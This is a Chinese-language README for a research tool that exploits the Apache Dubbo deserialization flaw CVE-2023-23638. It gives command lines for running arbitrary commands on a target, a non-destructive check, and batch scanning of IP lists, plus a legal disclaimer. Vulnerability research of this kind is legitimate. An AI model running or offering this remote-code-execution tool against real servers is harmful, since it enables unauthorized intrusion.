更全面的Dubbo漏洞扫描工具见我的另一个项目:https://github.com/YYHYlh/Dubbo-Scan
Apache Dubbo (CVE-2023-23638)漏洞利用的工程化实践,覆盖Dubbo 3.x 从服务发现到漏洞利用及回显的过程。本工具仅供研究和学习,欢迎各位师傅前来探讨和提出宝贵的建议。
本工具支持CVE-2023-23638在Dubbo 3.x的完整利用,覆盖服务发现到漏洞利用及回显。在Dubbo 2.x版本也可以利用,需要自行传入服务名、方法名等。针对这个漏洞我写了两篇分析文章:
本工具仅作学习使用,未考虑诸多实战中的问题,例如:
- 自定义服务名、方法名利用
字节码java编译的版本问题
后续会继续更新
本项目不会再更新,关于Dubbo更全面的扫描和利用后续会在另一个项目中开源,敬请期待!
感谢y4tacker师傅分享的fastjson原生反序列化思路
单URL漏洞利用
java -jar CVE-2023-23638.jar TARGET_IP TARGET_PORT COMMAND CHARSET(default UTF-8)
e.g.:
java -jar CVE-2023-23638.jar 127.0.0.1 20880 whoami
单URL漏洞无损检测
java -jar CVE-2023-23638.jar -s TARGET_IP TARGET_PORT
e.g.:
java -jar CVE-2023-23638.jar -s 127.0.0.1 20880
批量检测
1.txt:
127.0.0.1:20880
192.168.1.1:20880
java -jar CVE-2023-23638.jar -f FILE_PATH
e.g.:
java -jar CVE-2023-23638.jar -f 1.txt
本工具仅漏洞研究和学习,如您需要测试本工具的可用性,请自行搭建靶机环境。 在使用本工具进行检测时,您应确保该行为符合当地的法律法规,并且已经取得了足够的授权。请勿对非授权目标进行扫描。 如您在使用本工具的过程中存在任何非法行为,您需自行承担相应后果,我们将不承担任何法律及连带责任。